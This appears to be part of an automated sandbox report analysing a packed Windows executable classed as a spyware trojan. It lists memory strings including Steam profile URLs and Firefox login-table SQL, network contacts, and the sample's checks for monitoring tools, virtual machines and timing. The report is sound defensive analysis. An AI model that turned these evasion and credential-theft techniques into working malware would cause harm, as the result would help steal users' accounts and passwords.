                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2375411067.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2376803403.00000000012A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowe
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271010290.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271010290.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: tPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49747 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: tPSrcPbmRe.exeStatic PE information: section name:
                Source: tPSrcPbmRe.exeStatic PE information: section name: .idata
                Source: tPSrcPbmRe.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012EFA180_3_012EFA18
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012F484F0_3_012F484F
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012ED8E30_3_012ED8E3
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012B82320_3_012B8232
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012B96C20_3_012B96C2
                Source: tPSrcPbmRe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: tPSrcPbmRe.exeStatic PE information: Section: ZLIB complexity 0.9973980629280822
                Source: tPSrcPbmRe.exeStatic PE information: Section: lyuxeqdh ZLIB complexity 0.9946136290989771
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tPSrcPbmRe.exe, 00000000.00000003.2246108279.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2246411057.0000000005B72000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2222314691.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2222811784.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: tPSrcPbmRe.exeReversingLabs: Detection: 68%
                Source: tPSrcPbmRe.exeVirustotal: Detection: 69%
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile read: C:\Users\user\Desktop\tPSrcPbmRe.exeJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: tPSrcPbmRe.exeStatic file information: File size 1866752 > 1048576
                Source: tPSrcPbmRe.exeStatic PE information: Raw size of lyuxeqdh is bigger than: 0x100000 < 0x19f800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeUnpacked PE file: 0.2.tPSrcPbmRe.exe.a80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lyuxeqdh:EW;yvyxycgn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lyuxeqdh:EW;yvyxycgn:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: tPSrcPbmRe.exeStatic PE information: real checksum: 0x1cfea6 should be: 0x1d3564
                Source: tPSrcPbmRe.exeStatic PE information: section name:
                Source: tPSrcPbmRe.exeStatic PE information: section name: .idata
                Source: tPSrcPbmRe.exeStatic PE information: section name:
                Source: tPSrcPbmRe.exeStatic PE information: section name: lyuxeqdh
                Source: tPSrcPbmRe.exeStatic PE information: section name: yvyxycgn
                Source: tPSrcPbmRe.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01359843 push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01359843 push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01359843 push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012EE75C push eax; iretd 0_3_012EE761
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012EDCCD push esi; retf 0_3_012EDCD0
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_012F87C8 push ds; retf 0_3_012F87CA
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01359843 push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01359843 push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01359843 push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_0135988F push esp; ret 0_3_01359898
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeCode function: 0_3_01355278 push cs; iretd 0_3_01355279
                Source: tPSrcPbmRe.exeStatic PE information: section name: entropy: 7.985147260170899
                Source: tPSrcPbmRe.exeStatic PE information: section name: lyuxeqdh entropy: 7.9536418626160845

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: AD8358 second address: AD8362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C521B4 second address: C521BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9C81394BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C45416 second address: C4543B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9C80FB5666h 0x00000008 jmp 00007F9C80FB5673h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F9C80FB566Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51535 second address: C51539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51539 second address: C5154B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5154B second address: C5155E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F9C81394BF6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5155E second address: C51562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
